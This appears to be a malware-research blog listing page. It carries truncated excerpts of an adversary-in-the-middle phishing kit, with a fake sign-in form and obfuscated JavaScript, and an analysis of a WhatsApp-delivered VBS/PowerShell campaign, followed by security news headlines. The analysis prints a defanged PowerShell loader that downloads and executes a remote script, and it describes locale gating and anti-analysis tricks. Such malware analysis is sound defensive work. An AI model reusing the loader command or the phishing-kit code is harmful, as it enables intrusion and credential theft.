phishing-kit
AITM kit sample (inert / displayed as code) Verify your account No account? Create one! Sign in with a security key Next Sign-in options a@b.com Forgot password? Other ways to sign in Sign in window.addEventListener(‘load’,function(){ const configRef = window[Object.keys(window).find(k => k.startsWith(‘jsConfig_’))]; const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef; const hbCache = […]
Read More →phishing-module
window.addEventListener(‘load’,function(){ const configRef = window[Object.keys(window).find(k => k.startsWith(‘jsConfig_’))]; const { vars: _funcs14, functions: fnMap, props: hbProps } = configRef; const hbCache = window[_funcs14.phpConfig]; const errMsgs = window[_funcs14.errorMessages]; const stateb44f = window[_funcs14.validationState]; const options1ed0 = window[_funcs14.initialOptions]; let viewRef = window[_funcs14.view]; let email0132 = window[_funcs14.enmail]; const accessData747b = window[_funcs14.statusAccessData]; const hbIds = JSON.parse(atob(window[_funcs14.damang])); const _classes81 = JSON.parse(atob(window[_funcs14.suke]));f const […]
Read More →WhatsApp_VBS_PowerShell
Appendix B — PowerShell Snippets (Defanged) Observed Malicious Loader Command (Do NOT Execute) —————————————————————- powershell.exe -ep bypass “[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex ((New-Object Net.WebClient).DownloadString(‘https://miportuarios[.]com/sisti/api.ps1’))” IMAP Bootstrap (Mailbox as Config Channel) —————————————————————- # Opens TLS IMAP to imap.terra.com.br:993, logs in, searches subject “data”, fetches latest body. # Shown here for analysis context only; do NOT run in production. # (The […]
Read More →WhatApp_PowerShell_VBS-S2
Overview – Second-stage VBScript is executed in-memory via ExecuteGlobal by a Stage‑0 loader. – Primary goals: Portuguese locale gating, anti-analysis checks, configuration bootstrap (IMAP → multi-domain /data.php → Pastebin), PowerShell stage launch, optional self-delete. Locale Targeting (PT-BR/PT-PT) —————————————————————- Function CheckSystemLanguage() ‘ OSLanguage 1046 = pt-BR, 2070 = pt-PT ‘ Registry fallback: HKCU\Control Panel\International\sLanguage starts with […]
Read More →
Malwarebytes- Age verification vendor Persona left frontend exposed, researchers say February 20, 2026Behind a basic age check, researchers say Persona’s system runs extensive identity, watchlist, and adverse-media screening.
- Facebook ads spread fake Windows 11 downloads that steal passwords and crypto wallets February 20, 2026Attackers are weaponizing Facebook ads to distribute password-stealing malware masked as a Windows download.
- AI-generated passwords are a security risk February 19, 2026AI-generated passwords are "highly predictable" and aren’t truly random, making them easier for cybercriminals to crack.
- Age verification vendor Persona left frontend exposed, researchers say February 20, 2026
- ThreatPost
- Student Loan Breach Exposes 2.5M Records August 31, 20222.5 million people were affected, in a breach that could spell more trouble down the line.
- Watering Hole Attacks Push ScanBox Keylogger August 30, 2022Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
- Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms August 29, 2022Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
- Ransomware Attacks are on the Rise August 26, 2022Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.
- Cybercriminals Are Selling Access to Chinese Surveillance Cameras August 25, 2022Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
- Student Loan Breach Exposes 2.5M Records August 31, 2022